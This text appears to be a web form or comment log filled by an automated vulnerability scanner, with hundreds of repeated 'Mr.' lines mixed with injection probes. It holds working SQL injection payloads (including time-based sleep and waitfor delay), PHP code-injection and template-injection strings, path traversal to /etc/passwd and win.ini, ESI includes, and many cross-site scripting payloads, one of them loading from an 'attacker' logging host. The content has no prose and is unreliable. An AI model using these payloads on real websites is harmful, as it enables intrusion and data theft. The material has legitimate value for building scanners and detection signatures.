-1' OR 2+273-273-1=0+0+0+1 --

-1" OR 2+533-533-1=0+0+0+1 --

-1 OR 2+52-52-1=0+0+0+1

-1' OR 2+837-837-1=0+0+0+1 or 'g5JZofC9'='

Mr.

Mr.

-1 OR 2+122-122-1=0+0+0+1 --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'.print(md5(31337)).'

Mr.

Mr.

Mr.

${@print(md5(31337))}\

${@print(md5(31337))}

";print(md5(31337));$a="

Mr.

Mr.

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

<!--

Mr.

Mr.

'"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create/.

create

Mr.

Mr.

Mr.

Mr.

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Http://bxss.me/t/fit.txt

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

http://bxss.me/t/fit.txt?.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

)

Mr.

../Mr.

^(#$!@#$)(()))******

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

!(()&&!|*|*|

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999330+10000478}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

"+response.write(9841446*9124883)+"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'+response.write(9841446*9124883)+'

Mr.

response.write(9841446*9124883)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1%00%C0%A7%C0%A2%252527%252522

1'"

@@hzzMe

ITdbJmwo')) OR 239=(SELECT 239 FROM PG_SLEEP(15))--

ygNQ7lL8') OR 401=(SELECT 401 FROM PG_SLEEP(15))--

4XPrq3Px' OR 766=(SELECT 766 FROM PG_SLEEP(15))--

iCpTuC1t'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

if(now()=sysdate(),sleep(15),0)

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

-1" OR 2+732-732-1=0+0+0+1 --

-1' OR 2+617-617-1=0+0+0+1 or '1jL4fFL0'='

-1' OR 2+876-876-1=0+0+0+1 --

-1 OR 2+332-332-1=0+0+0+1 --

-1 OR 2+290-290-1=0+0+0+1

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.9569571

Mr.

Mr.

Mr.

'"()&%<acx><ScRiPt >f7I2(9351)</ScRiPt>

Mr.

Mr.

Mr.'"()&%<acx><ScRiPt >f7I2(9922)</ScRiPt>

Mr.

Mr.

Mr.

1%00%C0%A7%C0%A2%252527%252522

1'"

@@k5LCW

SzOQJdiC') OR 961=(SELECT 961 FROM PG_SLEEP(15))--

sm3YQNFV')) OR 254=(SELECT 254 FROM PG_SLEEP(15))--

FsxYlwpw' OR 117=(SELECT 117 FROM PG_SLEEP(15))--

8wz37b3u'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

-1" OR 2+48-48-1=0+0+0+1 --

Mr.

if(now()=sysdate(),sleep(15),0)

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

-1' OR 2+944-944-1=0+0+0+1 --

-1' OR 2+483-483-1=0+0+0+1 or 'o48uE8uo'='

-1 OR 2+651-651-1=0+0+0+1 --

Mr.

-1 OR 2+498-498-1=0+0+0+1

Mr.

Mr.9468248

'"()&%<acx><ScRiPt >vbn0(9799)</ScRiPt>

Mr.

Mr.'"()&%<acx><ScRiPt >vbn0(9620)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

<!--

'"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'.print(md5(31337)).'

Mr.

Mr.

${@print(md5(31337))}

Mr.

";print(md5(31337));$a="

Mr.

Mr.

Mr.

${@print(md5(31337))}\

Mr.

Mr.

/xfs.bxss.me

Mr.

';print(md5(31337));$a='

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

bxss.me

Mr.

http://bxss.me/t/fit.txt?.

Mr.

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Http://bxss.me/t/fit.txt

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

create

create/.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.

!(()&&!|*|*|

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

^(#$!@#$)(()))******

Mr.

Mr.

Mr.

)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1%00%C0%A7%C0%A2%252527%252522

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

@@9lGvP

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1'"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

dt6O8o79')) OR 817=(SELECT 817 FROM PG_SLEEP(15))--

Mr.

Mr.

95uMU7uV') OR 306=(SELECT 306 FROM PG_SLEEP(15))--

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'.print(md5(31337)).'

Mr.

Mr.

Mr.

nHLFuomu' OR 195=(SELECT 195 FROM PG_SLEEP(15))--

e9dvPmA6'; waitfor delay '0:0:15' --

Mr.

../Mr.

Mr.

Mr.

1 waitfor delay '0:0:15' --

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

${9999449+10000434}

Mr.

${@print(md5(31337))}\

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

Mr.

Mr.

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

Mr.

Mr.

-1' OR 2+660-660-1=0+0+0+1 --

Mr.

Mr.

Mr.

-1" OR 2+83-83-1=0+0+0+1 --

Mr.

-1 OR 2+962-962-1=0+0+0+1

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

'"()&%<acx><ScRiPt >UsYD(9599)</ScRiPt>

Mr.9683087

-1' OR 2+633-633-1=0+0+0+1 or '7T4upM27'='

Mr.

Mr.

Mr.

Mr.

${@print(md5(31337))}

Mr.

Mr.

Mr.

Mr.'"()&%<acx><ScRiPt >UsYD(9485)</ScRiPt>

-1 OR 2+321-321-1=0+0+0+1 --

Mr.

Mr.

";print(md5(31337));$a="

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

';print(md5(31337));$a='

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'+response.write(9540341*9431145)+'

Mr.

"+response.write(9540341*9431145)+"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

response.write(9540341*9431145)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create/.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

<!--

create

create

Mr.

bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me

http://bxss.me/t/fit.txt?.

@@3HUr7

1%00%C0%A7%C0%A2%252527%252522

Mr.

Mr.

^(#$!@#$)(()))******

!(()&&!|*|*|

1'"

1some_inexistent_file_with_long_name.

Http://bxss.me/t/fit.txt

)

kU0g9TU1')) OR 694=(SELECT 694 FROM PG_SLEEP(15))--

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

y1S7SSVi') OR 728=(SELECT 728 FROM PG_SLEEP(15))--

Mr.

Mr.

Mr.

WWRXRKLm' OR 26=(SELECT 26 FROM PG_SLEEP(15))--

Mr.

Mr.

Mr.

Mr.

Mr.

'.print(md5(31337)).'

${@print(md5(31337))}\

Mr.

Mr.

Mr.

Mr.

26rgFEyp'; waitfor delay '0:0:15' --

Mr.

1 waitfor delay '0:0:15' --

Mr.

Mr.

Mr.

Mr.

";print(md5(31337));$a="

Mr.

${@print(md5(31337))}

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

Mr.

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

Mr.

Mr.

';print(md5(31337));$a='

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

-1" OR 2+281-281-1=0+0+0+1 --

Mr.

Mr.

Mr.

-1' OR 2+94-94-1=0+0+0+1 or 'kzJWOvOE'='

Mr.

Mr.

Mr.

Mr.

-1' OR 2+799-799-1=0+0+0+1 --

Mr.

-1 OR 2+649-649-1=0+0+0+1

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

-1 OR 2+545-545-1=0+0+0+1 --

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999670+10000158}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.9291213

'"()&%<acx><ScRiPt >oxWz(9230)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.'"()&%<acx><ScRiPt >oxWz(9778)</ScRiPt>

Mr.

Mr.

"+response.write(9445126*9536707)+"

'+response.write(9445126*9536707)+'

Mr.

Mr.

Mr.

response.write(9445126*9536707)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create/.

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"

Mr.

<!--

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Http://bxss.me/t/fit.txt

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

1some_inexistent_file_with_long_name.

bxss.me

http://bxss.me/t/fit.txt?.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

^(#$!@#$)(()))******

Mr.

Mr.

)

Mr.

Mr.

'"()

Mr.

../Mr.

!(()&&!|*|*|

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999532+9999479}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

"+response.write(9468845*9689859)+"

Mr.

Mr.

Mr.

'+response.write(9468845*9689859)+'

Mr.

Mr.

Mr.

Mr.

Mr.

response.write(9468845*9689859)

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

create/.

Mr.

Mr.

Mr.

Mr.

Mr.

'.print(md5(31337)).'

create

Mr.

Mr.

Mr.

Mr.

${@print(md5(31337))}\

Mr.

Mr.

";print(md5(31337));$a="

Mr.

Mr.

Mr.

<!--

${@print(md5(31337))}

'"

Mr.

';print(md5(31337));$a='

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Http://bxss.me/t/fit.txt

Mr.

http://bxss.me/t/fit.txt?.

Mr.

Mr.

Mr.

bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

^(#$!@#$)(()))******

!(()&&!|*|*|

Mr.

Mr.

Mr.

Mr.

Mr.

)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999792+9999218}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

"+response.write(9752381*9930942)+"

'+response.write(9752381*9930942)+'

Mr.

Mr.

Mr.

response.write(9752381*9930942)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1aMDfsPIEO

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.</script><script>NYMn(9485)</script>

%4D%72%2E%39%34%35%38%27%28%29%3B%7D%5D%39%32%39%34

Mr.9991'();}]9279

Mr.<a7RIjX1<

Mr.<ifRAme sRc=9546.com></IfRamE>

Mr.<img sRc='http://attacker-9675/log.php?

Mr.<auWJLoJ x=9233>

Mr.fY9Un <ScRiPt >NYMn(9957)</ScRiPt>

Mr.<WQGWYL>VPVXQ[!+!]</WQGWYL>

Mr.}body{acu:Expre/**/SSion(NYMn(9596))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

Mr.<input autofocus onfocus=NYMn(9593)>

%F6<img%20acu%20onmouseover=NYMn(96041)%20//%F6>

Mr.&lt;ScRiPt&gt;NYMn(9703)&lt;/sCripT&gt;

Mr.\u003CScRiPt\NYMn(9813)\u003C/sCripT\u003E

Mr.<img/src=">" onerror=alert(9443)>

Mr.<img src=xyz OnErRor=NYMn(9770)>

Mr.<img src=//xss.bxss.me/t/dot.gif onload=NYMn(9708)>

Mr.<isindex type=image src=1 onerror=NYMn(9868)>

Mr.<body onload=NYMn(9998)>

Mr.<svg%09%0A%0B%0C%0D%A0%00onload=NYMn(9803);>

Mr.<ScRiPt >NYMn(9296)</ScRiPt>

Mr.<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9717></ScRiPt>

Mr.<ScRiPt >NYMn(9127)</ScRiPt>

Mr.<ScR<ScRiPt>IpT>NYMn(9653)</sCr<ScRiPt>IpT>

Mr.<script>NYMn(9764)</script>

Mr.<WNL9JC>H6UHP[!+!]</WNL9JC>

Mr.<ScRiPt >NYMn(9434)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx[[${98991*97996}]]xca

acx__${98991*97996}__::.x

acx{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

<th:t="${acx}#foreach

<%={{={@{#{${acx}}%>

acux9252%C0%BEz1%C0%BCz2a%90bcxuca9252

acu9266<s1﹥s2ʺs3ʹuca9266

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx[[${98991*97996}]]xca

acx__${98991*97996}__::.x

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

acx{{98991*97996}}xca

<th:t="${acx}#foreach

<%={{={@{#{${acx}}%>

